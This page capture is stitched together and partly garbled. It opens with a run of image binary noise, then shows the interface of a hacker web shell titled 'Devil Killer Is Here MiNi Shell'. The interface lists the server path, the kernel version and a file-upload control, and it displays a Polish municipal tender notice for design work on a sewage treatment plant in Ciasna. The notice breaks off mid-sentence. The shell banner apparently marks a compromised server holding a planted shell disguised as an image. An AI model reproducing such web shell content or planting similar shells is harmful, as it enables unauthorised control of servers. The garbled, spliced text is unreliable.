JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220511/0015383901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przygotowanie dokumentacji projektowo- kosztorysowej dla przebudowy istniejącej oczyszczalni ścieków w Ciasnej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CIASNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398416</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Nowa 1a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciasna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-793</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34 35 35 100</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@ciasna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">ciasna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przygotowanie dokumentacji projektowo- kosztorysowej dla przebudowy istniejącej oczyszczalni ścieków w Ciasnej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0116706f-d11c-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00153839</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://josephine.proebiz.com</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Art. 68. Przekazywanie ofert, wniosków<br/>o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia lub w konkursie, wniosków, o których mowa w art. 371 ust. 3,<br/>oraz prac konkursowych odbywa się przy użyciu środków komunikacji elektronicznej, zapewniających zachowanie integralności,<br/>autentyczności, nienaruszalności danych i ich poufności w ramach wymiany i przechowywania informacji, w tym zapewniających<br/>możliwość zapoznania się z ich treścią wyłącznie po upływie terminu na ich składanie.1. Komunikacja między zamawiającym a<br/>wykonawcą.1.1 JOSEPHINE to aplikacja internetowa znajdująca się na domenie https://josephine.proebiz.com, która jest<br/>przeznaczona do elektronicznej komunikacji między zamawiającym a wykonawcą w rozumieniu ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych (Dz.U.2019.2019 z dnia 2019.10.24 z późniejszymi zmianami).1.2 Zamawiający będzie komunikował<br/>się z wykonawcami za pośrednictwem modułu komunikacyjnego systemu JOSEPHINE. Złożenie oferty, złożenie wniosku o<br/>dopuszczenie do udziału, złożenie wniosku o wyjaśnienie dokumentacji przetargowej, uzupełnienie kwalifikacji, wyjaśnienie ofert,<br/>zgłaszanie sprzeciwu, nastąpi pomiędzy zainteresowaną stroną (zwana dalej „wykonawcą”) i zamawiającym wyłącznie drogą<br/>elektroniczną w języku polskim oraz w sposób gwarantujący kompletność danych zawartych we wszystkich dokumentach, w tym<br/>ochronę danych poufnych i osobowych. Ta metoda komunikacji dotyczy wszelkiej komunikacji elektronicznej między zamawiającym<br/>a wykonawcą, w tym komunikacji w dynamicznym systemie zakupów (zwanym dalej „DSZ”).1.3 Aby bezproblemowo korzystać z<br/>systemu JOSEPHINE, konieczne jest korzystanie z komputera podłączonego do internetu i przeglądarki internetowej. Szczegółowe<br/>informacje dotyczące wymagań technicznych znajdują się pod adresem<br/>https://store.proebiz.com/docs/josephine/pl/Wymagania_techniczne_sw_JOSEPHINE.pdf<br/>Oferta musi być sporządzona pod rygorem nieważności w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Wszystkie<br/>oświadczenia i dokumenty składane wraz z ofertą muszą być sporządzone w postaci elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym (formie elektronicznej) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.Uszczegółowienie i pozostałe ustalenia odnośnie wymagań technicznych i organizacyjnych dot. korespondencji<br/>elektronicznej zawarte są w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>(Dz. Urz. UE L 119 z 04.05.2016 z późniejszymi zmianami), dalej „RODO”, informuję, że:<br/>- W przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu w trakcie trwania postępowania czy realizacji umowy na:<br/>„Przygotowanie dokumentacji projektowo- kosztorysowej dla przebudowy istniejącej oczyszczalni ścieków w Ciasnej&#34; Pani/Pana<br/>danych osobowych, przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego właściwego w sprawach ochrony<br/>danych osobowych.<br/>- Podanie przez Panią/Pana danych osobowych jest obowiązkowe, gdyż przesłankę przetwarzania danych osobowych stanowi<br/>przepis prawa Pani/Pan dane mogą być przetwarzane w sposób zautomatyzowany<br/>i nie będą profilowane.<br/>􀀀 administratorem Pani/Pana danych osobowych jest Urząd Gminy Ciasna<br/>􀀀 w sprawach z zakresu ochrony danych osobowych może się Pan/Pani kontaktować z Inspektorem Ochrony Danych pod adresem<br/>e-mail: aleksandra@eduodo.pl lub iod@eduodo.pl;<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego /dane identyfikujące postępowanie, np. nazwa, numer/ prowadzonym w trybie przetargu<br/>nieograniczonego;<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 78 ustawy Prawo zamówień publicznych, dalej „ustawa Pzp”;<br/>􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres co najmniej 4 lat od dnia składania<br/>ofert a jeżeli zobowiązania wskazane w ofercie i umowie przekroczą ww przedział czasowy, okres przechowywania obejmuje ten<br/>termin;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.22 RODO;<br/>􀀀 posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>􀀀 nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGK.ID.271.7.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia: Kompleksowe przygotowanie dokumentacji projektowo- kosztorysowej dla przebudowy<br/>istniejącej oczyszczalni ścieków w Ciasnej.<br/>Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowo-kosztorysowej przebudowy istniejącej<br/>oczyszczalni ścieków w Ciasnej wraz ze wszystkimi uzgodnieniami i pozwoleniami formalno-prawnymi zezwalającymi na<br/>przeprowadzenie zamówienia publicznego zgodnie z obowiązującym prawem zamówień publicznych, a następnie<br/>rozpoczęcie wykonywania robót i oddanie do użytkowania w pełni sprawnej oczyszczalni.<br/>Szczegółowy opis przedmiotu zamówienia oraz dane niezbędne do sporządzenia dokumentacji zawiera Program<br/>Funkcjonalno-użytkowy (dalej PFU) oraz obliczenia technologiczne dla okresu aktualnego i docelowego dla oczyszczalni<br/>ścieków w Ciasnej, stanowiące załącznik do niniejszej specyfikacji warunków zamówienia (dalej SWZ). Opis przedmiotu<br/>zamówienia został wskazany w załączniku nr 10 do SWZ.<br/>Uwagi!<br/>Program funkcjonalno- użytkowy sporządzony został w 2019 roku wobec czego dokumentacja projektowo-kosztorysowa<br/>musi zostać opracowana w sposób wskazany w PFU jednocześnie z uwzględnieniem obowiązujących przepisów i norm w<br/>tym zakresie (zwłaszcza w odniesieniu do zmian wprowadzonych w prawie budowlanym).<br/>Podstawą do sporządzenia dokumentacji projektowo- kosztorysowej jest PFU jednakże Zamawiający zastrzega sobie prawo<br/>do wprowadzania zmian i poprawek.<br/>2.1 Opis przedmiotu zamówienia, podstawowe obowiązki Wykonawcy, wymagania Zamawiającego w stosunku do<br/>dokumentacji:<br/>a) Dokumentację projektową należy wykonać w języku polskim, na aktualnych mapach do celów projektowych, zgodnie z<br/>obowiązującymi przepisami, warunkami technicznymi, sztuką budowlaną oraz winna ona być opatrzona klauzulą o<br/>kompletności i przydatności z punktu widzenia celu, któremu ma służyć,<br/>b) Dokumentacja powinna zostać wykonana w wersji papierowej i elektronicznej, zawierać oświadczenie projektanta o<br/>zgodności wersji papierowej i elektronicznej oraz zawierać oświadczenie o kompletności uzgodnień,<br/>c) Wykonawca opracowujący projekty jest zobowiązany do przekazywania Zamawiającemu kopii pism składanych do<br/>uzgodnień.<br/>d) Dokonanie w imieniu Zamawiającego, na podstawie otrzymanych pełnomocnictw, wszelkich uzgodnień formalnoprawnych<br/>właściwych organów administracji architektoniczno-budowlanej zezwalających na rozpoczęcie robót (ostateczne<br/>pozwolenie na budowę lub akceptacja zgłoszenia- kopię wniosku z potwierdzeniem daty wpływu należy przekazać<br/>Zamawiającemu).<br/>e) Uzyskanie wymaganymi przepisami sprawdzeń, uzgodnień, opinii, pozwoleń i decyzji administracyjnych wymaganych<br/>przepisami prawa w tym: prawa budowlanego, prawa ochrony środowiska, prawo wodne.f) W dokumentacji projektowej należy przewidzieć wszelkie niezbędne połączenia technologiczne projektowanej<br/>infrastruktury z istniejącymi obiektami oczyszczalni ścieków.<br/>g) Projekty będą zawierały niezbędne elementy umożliwiające określenie zakresu robót, materiałów i rozwiązań<br/>konstrukcyjnych.<br/>h) Wykonawca zapewni spójność wszystkich projektów, tj. m.in. ujednolicenie rozwiązań projektowych, lokalizacji<br/>projektowanych elementów pomiędzy dokumentami opracowywanymi w ramach różnych branż oraz pomiędzy dokumentami<br/>opracowywanymi przez różnych Projektantów,<br/>i) Wszelkie opłaty administracyjne ponoszone w wyniku prowadzonych działań związanych z uzyskiwaniem uzgodnień,<br/>opinii i decyzji Wykonawca winien wliczyć do ceny opracowania dokumentacji projektowej,<br/>j) Informacje zawarte w dokumentacji projektowej w zakresie technologii wykonania robót, doboru materiałów i urządzeń<br/>należy określić w sposób zgodny z przepisami ustawy Prawo Zamówień Publicznych,<br/>k) Bieżące uzgadnianie z Zamawiającym rozwiązań projektowych i materiałowych na każdym etapie projektowania i<br/>uwzględnieniem wytycznych do projektowania określonych przez Zamawiającego,<br/>l) Projekt budowlany musi uwzględniać etapowanie realizacji przebudowy oczyszczalni ścieków w ten sposób, że w okresie<br/>prowadzenia rozbudowy oczyszczalni zapewniony będzie ciągły i nieprzerwany odbiór i oczyszczanie ścieków<br/>dopływających z kanalizacji sanitarnej zgodnie z obowiązującym pozwoleniem wodnoprawnym w tym uzyskiwanie<br/>wymaganych parametrów ścieków oczyszczonych.<br/>m) Opracowanie instrukcji obsługi, eksploatacji, bhp i p.poż. (w razie konieczności instrukcja współpracy ruchowej),<br/>n) Przed wystąpieniem Wykonawcy do właściwych organów administracji architektoniczno-budowlanej Wykonawca<br/>przedłoży Zamawiającemu jeden komplet dokumentacji projektowo-kosztorysowej celem ostatecznego uzgodnienia,<br/>o) Opracowanie, zgodnie z obowiązującymi przepisami, przedmiarów robót oraz kosztorysów inwestorskich wraz z<br/>ewentualną, jednokrotną aktualizacją na wezwanie Zamawiającego w okresie 3 lat od dnia przekazania dokumentacji<br/>Zamawiającemu (koszty aktualizacji należy zawrzeć w cenie oferty). Ilość dokumentacji przedmiarowo– kosztorysowej: dwa<br/>egzemplarze papierowe oraz wersja elektroniczna,<br/>p) Opracowanie, zgodnie z obowiązującymi przepisami, Specyfikacji Technicznych Wykonania i Odbioru Robót<br/>Budowlanych (STWiORB),<br/>q) W ramach przedmiotu zamówienia będzie pełnienie nadzoru autorskiego w trakcie robót budowlanych oraz pełnienie<br/>obowiązków projektanta przewidzianych w ustawie Prawo Budowlane,<br/>r) Wykonawca każdorazowo będzie zobowiązany do przedstawienia Zamawiającemu skutków finansowych zmian w<br/>dokumentacji w stosunku do rozwiązań poprzednich.<br/>s) W ramach ceny ofertowej Wykonawca zobowiązany będzie do:<br/>- udziału w naradach roboczych zwoływanych przez Inwestora. Celem narad jest wykazanie się stanem zaawansowania<br/>prac nad dokumentacją oraz analiza proponowanych rozwiązań technicznych. Narady robocze odbywać się będą w<br/>siedzibie Inwestora lub na terenie oczyszczalni ścieków,<br/>- w razie konieczności współpracy przy składaniu przez Inwestora wniosków o dofinansowanie realizacji inwestycji ze źródeł<br/>zewnętrznych (projekt musi być zgodny z warunkami instytucji gospodarujących środkami pomocowymi),<br/>- udziału w procedurze wyboru wykonawcy robót budowlanych w zakresie udzielania odpowiedzi na zapytania dotyczące<br/>rozwiązań zawartych w dokumentacji projektowej (stosowne wyjaśnienia Wykonawca zobowiązany jest przekazać<br/>niezwłocznie, lecz nie później niż w ciągu 2 dni roboczych, drogą elektroniczną lub w formie pisemnej),<br/>- na wezwanie Zamawiającego, w przypadku wprowadzenia zmian stanowiących nieistotne odstępstwo od zatwierdzonego<br/>projektu, uczestnictwo w procedurze odbiorowej poprzez naniesienie na sporządzonym projekcie tych zmian i potwierdzeniu<br/>ich stosownymi oświadczeniami niezbędnymi do odbiorów we właściwym Inspektoracie Nadzoru Budowlanego (własnym<br/>staraniem i na własny koszt),<br/>t) Ogólne założenia koncepcyjne dotyczące lokalizacji i rozwiązań technicznych muszą zostać skonsultowane oraz<br/>zatwierdzone przez Zamawiającego.<br/>u) Zamawiający, na obecnym etapie prowadzonego postępowania, dostrzega konieczność uwzględnienia w dokumentacji<br/>projektowej nieuwzględnionych w PFU elementów:<br/>- zamontowanie czterech nowych dmuchaw (4P) zamiast proponowanych w PFU trzech (2P+1R czynna),<br/>- agregatu prądotwórczego zabezpieczającego działanie oczyszczalni na wypadek awarii zasilania,<br/>- dodatkowego zbiornika (beczki asenizacyjnej) o pojemności 8 tys. litrów,<br/>- innych elementów towarzyszących niezbędnych do prawidłowego działania oczyszczalni (ciągnik, zamiatarka),<br/>- remontu/przebudowy zbiornika uśredniającego,<br/>- przeprojektowania układu sterowania z uwzględnieniem konieczności modernizacji i rozbudowy szafy sterowniczej o<br/>kolejne segmenty,<br/>- demontaż starej prasy odwadniania osadu i zaprojektowanie nowej.<br/>Do obowiązków Wykonawcy należała będzie także ocena (wskutek wizji na miejscu) stanu istniejącego pozostałych<br/>elementów oczyszczalni (także tych nie uwzględnionych w PFU) i uwzględnienia w dokumentacji projektowych zmian<br/>niezbędnych do prawidłowego jej funkcjonowania jako całości (przeprojektowanie układu sterowania, konieczność<br/>wymiany/remontu elementów zniszczonych/zużytych). Wszelkie zmiany muszą zostać przedstawione do akceptacji przez<br/>Zamawiającego.<br/>3. Inne postanowienia<br/>Zobowiązuje się Wykonawcę o niezwłoczne informowanie Zamawiającego o wszelkich problemach występujących w trakcie<br/>wykonywania przedmiotu zamówienia, których nie będzie mógł samodzielnie rozwiązać.<br/>Ostatecznie złożona u Zamawiającego liczba egzemplarzy (po wszelkich uzgodnieniach i pozwoleniach) to dwie wersje papierowe oraz jedna wersja elektroniczna (nieedytowalna, odczytywalna elektronicznie- preferowany format to .pdf) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi kryteriami i wagami:<br/>1) cena waga ( Kc ): 60%<br/>2) termin wykonania przedmiotu zamówienia (od dnia podpisania umowy) ( Kg ): 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania przedmiotu zamówienia (od dnia podpisania umowy)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się 